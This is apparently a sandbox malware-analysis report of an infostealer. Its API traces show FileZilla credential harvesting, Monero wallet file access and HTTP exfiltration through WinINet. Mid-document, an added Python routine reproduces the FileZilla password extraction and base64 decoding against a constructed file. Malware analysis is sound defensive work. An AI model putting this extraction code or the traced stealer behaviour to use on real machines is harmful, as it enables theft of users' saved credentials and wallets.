                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79e1d96046c1b11e9f689ebfca26dba6badb28a0f23823ae9b9f4e94746568e1
                                    • Instruction ID: a6cf5978502afc3932d6a7776a197f03e12d438429ac6e95bf93d8a6e839d948
                                    • Opcode Fuzzy Hash: 79e1d96046c1b11e9f689ebfca26dba6badb28a0f23823ae9b9f4e94746568e1
                                    • Instruction Fuzzy Hash: 3E51B0B3D082109FE3006E29EC8576AFBE5EB94310F1B493DDAD893744E67958548BC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b78decc414097db23cbad8cb77b8910555b1a4d3e06721360cab9746c3d71ede
                                    • Instruction ID: e7bf319b5ece0014e136f71be42998a081428a01a8bb0fb075b6537be866dae2
                                    • Opcode Fuzzy Hash: b78decc414097db23cbad8cb77b8910555b1a4d3e06721360cab9746c3d71ede
                                    • Instruction Fuzzy Hash: 134155F3E181149BE300AE7CEC45767B6E9DBD0720F2A493CD988D7380E9B9980583C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 17ed49d0286cda44c208cea3ba5a736c5021dd24906c6d4ababee80fcb427080
                                    • Instruction ID: 34df304184b6f869e765693e7c5ffb4d9173dc26f85d868960787ae399ca3d32
                                    • Opcode Fuzzy Hash: 17ed49d0286cda44c208cea3ba5a736c5021dd24906c6d4ababee80fcb427080
                                    • Instruction Fuzzy Hash: EE31C7F261C600DFD344AF35C881EBAB7E9EB44340F06492FD6C687764E6B594428753
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba206a0a2aa2caf054df1383b7a8b19442f1bf7b3037f96c4841ae399a06566e
                                    • Instruction ID: 9fb1110bd96aaf1cab1e37b6071ed44ac5731c3dfa981d5ca04fdff8125a173a
                                    • Opcode Fuzzy Hash: ba206a0a2aa2caf054df1383b7a8b19442f1bf7b3037f96c4841ae399a06566e
                                    • Instruction Fuzzy Hash: 3F3149B280C610EFE301BF59D8816AAFBE5FF58351F02882DEAC893610E6315840CBD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                      • Part of subcall function 00FE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                      • Part of subcall function 00FE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                      • Part of subcall function 00FE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                      • Part of subcall function 00FE99C0: LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                      • Part of subcall function 00FE99C0: CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                      • Part of subcall function 00FF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FF8E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,01000DBA,01000DB7,01000DB6,01000DB3), ref: 00FF0362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF0369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FF0385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FF03CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF03DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00FF0419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FF0463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FF0562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00FF0571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00FF0580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF0593
                                    • lstrcat.KERNEL32(?,01001678), ref: 00FF05A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF05B5
                                    • lstrcat.KERNEL32(?,0100167C), ref: 00FF05C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 00FF05D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF05E6
                                    • lstrcat.KERNEL32(?,01001688), ref: 00FF05F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00FF0604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF0617
                                    • lstrcat.KERNEL32(?,01001698), ref: 00FF0626
                                    • lstrcat.KERNEL32(?,0100169C), ref: 00FF0635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 1488da8b6d541db1134a6280709254ff8db4caef43faf01efcc825a92e4968b2
                                    • Instruction ID: 090673f74c93e4280bd3026d4ada89d8b58c385fe1a970402f25fdc624794b25
                                    • Opcode Fuzzy Hash: 1488da8b6d541db1134a6280709254ff8db4caef43faf01efcc825a92e4968b2
                                    • Instruction Fuzzy Hash: 7FD120B190010CABDB14FBE0DD9AEFE7378AF14340F444418F206A75A5EF78AA06DB61
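The function above is the sample's FileZilla credential collector. Read together, the trace says: resolve a profile folder with SHGetFolderPathA (the CSIDL argument is 0x1C, CSIDL_LOCAL_APPDATA, while the string table carries \AppData\Roaming\FileZilla\recentservers.xml; how the final path is assembled is not visible in this listing), read the whole file into a LocalAlloc buffer via CreateFileA/GetFileSizeEx/ReadFile, then locate the <Host>, <Port>, <User> and <Pass encoding="base64"> tags with plain StrStrA substring searches rather than an XML parser, and finally lstrcat the labels browser: FileZilla, profile: null, url: , login: and password: around the recovered values to build one record per saved server. The Python below is an added example reproducing that extraction against a constructed recentservers.xml; it is not the report's or the sample's code. Two points are assumptions: the ':' between host and port and the line breaks in the record, which the listing shows only as unresolved string addresses (01001678, 0100167C, 01001688, 01001698, 0100169C), and the bounding of each record at the next <Host>, which the trace does not show. The base64 decoding follows FileZilla's own encoding="base64" attribute.

```python
import base64
import binascii

# The four tags the listing shows being located with StrStrA.
HOST, PORT, USER, PASS = "<Host>", "<Port>", "<User>", '<Pass encoding="base64">'


def _text_after(buf, tag, start=0):
    """StrStrA-style scan: find `tag` at or after `start` and return
    (text up to the next '<', index just past the tag); (None, -1) if absent."""
    i = buf.find(tag, start)
    if i < 0:
        return None, -1
    i += len(tag)
    j = buf.find("<", i)
    return buf[i:j if j >= 0 else len(buf)].strip(), i


def _decode_pass(b64):
    """FileZilla writes the plaintext password base64-encoded; keep the raw
    value if it does not decode cleanly instead of dropping the record."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return b64


def parse_recentservers(xml_text):
    """Walk every <Host> in recentservers.xml and pull the sibling fields the
    same substring-scan way. A server saved with anonymous logon has no <User>
    or <Pass> element and yields empty fields rather than an error.
    Record boundary at the next <Host> is an assumption (see lead-in)."""
    entries, pos = [], 0
    while True:
        host, pos = _text_after(xml_text, HOST, pos)
        if host is None:
            break
        nxt = xml_text.find(HOST, pos)
        record = xml_text[pos:nxt if nxt >= 0 else len(xml_text)]
        port, _ = _text_after(record, PORT)
        user, _ = _text_after(record, USER)
        b64, _ = _text_after(record, PASS)
        entries.append({
            "host": host,
            "port": port or "",
            "user": user or "",
            "password": _decode_pass(b64) if b64 else "",
        })
    return entries


def format_record(entry):
    """Build the text block the listing assembles with lstrcat. The ':' and the
    newlines are assumed separators; the listing shows only their addresses."""
    return ("browser: FileZilla\n"
            "profile: null\n"
            f"url: {entry['host']}:{entry['port']}\n"
            f"login: {entry['user']}\n"
            f"password: {entry['password']}\n")


# Constructed sample in the FileZilla recentservers.xml layout; not taken from
# the analysed machine. "aHVudGVyMg==" is base64 for "hunter2".
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
    <RecentServers>
        <Server>
            <Host>ftp.example.test</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User>deploy</User>
            <Pass encoding="base64">aHVudGVyMg==</Pass>
            <Logontype>1</Logontype>
        </Server>
        <Server>
            <Host>sftp.internal.test</Host>
            <Port>2222</Port>
            <Protocol>1</Protocol>
            <Type>0</Type>
            <Logontype>0</Logontype>
        </Server>
    </RecentServers>
</FileZilla3>
"""

if __name__ == "__main__":
    for entry in parse_recentservers(SAMPLE_RECENTSERVERS):
        print(format_record(entry))
```

Because the extraction is a substring scan, anything the stealer exfiltrates is exactly what FileZilla stores: a recentservers.xml with Logontype 1 entries is a plaintext credential store, and the defensive check is simply whether that file (and sitemanager.xml, which uses the same tags) exists with saved passwords on hosts in scope.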
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FE59F8
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE5A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE5B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0180EB40,00000000,?,0180A508,00000000,?,01001A1C), ref: 00FE5E71
                                    • lstrlen.KERNEL32(00000000), ref: 00FE5E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FE5E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE5E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00FE5EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00FE5ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FE5EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00FE5F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FE5F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FE5F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE5FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE5FBD
                                    • HttpOpenRequestA.WININET(00000000,0180EBC0,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE5BF8
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE5FC7
                                    Strings
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: e94d1bc2f529aa4c9d1edc1756d1522141870320a0fe4fffc9e820c7a088ee7f
                                    • Instruction ID: 77695cd8bae0ebfdeb768435a6cbdd43a0e5a99eb9bd5752e3e7e98037abee28
                                    • Opcode Fuzzy Hash: e94d1bc2f529aa4c9d1edc1756d1522141870320a0fe4fffc9e820c7a088ee7f
                                    • Instruction Fuzzy Hash: 831221B181011CAADB25EBA0DC95FFE7378BF14740F4041A9F20A621A1EFB46B49DF55
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FECF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FED0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FED0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED208
                                    • lstrcat.KERNEL32(?,01001478), ref: 00FED217
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED22A
                                    • lstrcat.KERNEL32(?,0100147C), ref: 00FED239
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED24C
                                    • lstrcat.KERNEL32(?,01001480), ref: 00FED25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED26E
                                    • lstrcat.KERNEL32(?,01001484), ref: 00FED27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED290
                                    • lstrcat.KERNEL32(?,01001488), ref: 00FED29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED2B2
                                    • lstrcat.KERNEL32(?,0100148C), ref: 00FED2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED2D4
                                    • lstrcat.KERNEL32(?,01001490), ref: 00FED2E3
                                      • Part of subcall function 00FFA820: lstrlen.KERNEL32(00FE4F05,?,?,00FE4F05,01000DDE), ref: 00FFA82B
                                      • Part of subcall function 00FFA820: lstrcpy.KERNEL32(01000DDE,00000000), ref: 00FFA885
                                    • lstrlen.KERNEL32(?), ref: 00FED32A
                                    • lstrlen.KERNEL32(?), ref: 00FED339
                                      • Part of subcall function 00FFAA70: StrCmpCA.SHLWAPI(018090E0,00FEA7A7,?,00FEA7A7,018090E0), ref: 00FFAA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FED3B4
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated dumps and IDA snapshot: same set as listed for the previous function (module image at 00FE0000, snapshot hcaresult_0_2_fe0000_file.jbxd)
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: dec7f9fe0500df7f3556e506bb14f1aa3d1af29b52db147ffa0e64b3facff063
                                    • Instruction ID: b613bc07538c0aa9c4946873d566f7792743cd124d814593baaa39a79e8d18cb
                                    • Opcode Fuzzy Hash: dec7f9fe0500df7f3556e506bb14f1aa3d1af29b52db147ffa0e64b3facff063
                                    • Instruction Fuzzy Hash: 06E145B1910108ABDB24EFA0DD95EFE7378BF14300F104158F60BA75A5DF79AA05DB62
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FE4915
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE4ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,01000DDB,00000000,?,?,00000000,?,",00000000,?,0180EAB0), ref: 00FE4DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FE4E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FE4E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FE4E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE4EAD
